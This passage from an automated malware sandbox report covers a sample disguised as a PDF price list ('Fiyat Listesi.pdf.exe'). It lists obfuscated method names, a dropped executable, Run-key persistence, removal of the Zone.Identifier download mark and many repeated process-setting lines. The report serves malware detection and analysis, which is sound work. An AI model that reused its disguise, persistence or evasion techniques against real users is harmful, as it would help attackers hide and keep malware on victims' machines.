                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, xDw2ELFt4Xo5vfTyeF.csHigh entropy of concatenated method names: 'FJj4GgtrdP', 'Bou4kRb3ef', 'B1J4RDrXgk', 'TyY4nWlJew', 'RyY4A8sS0o', 'uhm4DcfChL', 'vtL4sOaOLM', 'XFnf3JAIlx', 'tApfVjgH7e', 'UBkfud9Axl'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, D4BEQu9Cihv1XbLmAc.csHigh entropy of concatenated method names: 'FZdDrgGrF7', 'qruDaEhtPu', 'eahpQE9AZw', 'USiplJGyD3', 'YRxp2IdlQs', 'zfqpKdFH5u', 'pbNp0lWCqD', 'TdnpPeSvXA', 'WvnpmZ6IHy', 'yMoptgwLHb'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, ixuyA3mZZVVGTgDOSP.csHigh entropy of concatenated method names: 'FuNyE6tpgX', 'XmNygceMv8', 'Gg2yLjCvJD', 'tk7yYglUrr', 'XBcyruOq2X', 'L11yxDPIj9', 'L1AyaXXYo9', 'x1Uyvsi6h7', 'aVyyXMxD0L', 'ruXy98ek8n'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, fuJ1oYu87Z4qheEs6f.csHigh entropy of concatenated method names: 'yi5fMMvFXp', 'X6NfZ8RsrQ', 'ppYfQmBWhQ', 'YuZflyYdZN', 'b0OfUA24Aw', 'o3Sf22AxRX', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.csHigh entropy of concatenated method names: 'EoKkdVC7RB', 'NmmknX6cj9', 'FG8kAYvGag', 'nygkpFFDc2', 'hRhkDcfKOt', 'HTbks8qmcC', 'tkGkyWku91', 'Qo2kCygMrs', 'So5ki65NWO', 'FqQkbvOKYK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.5c10000.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33ce948.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to dropped file
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
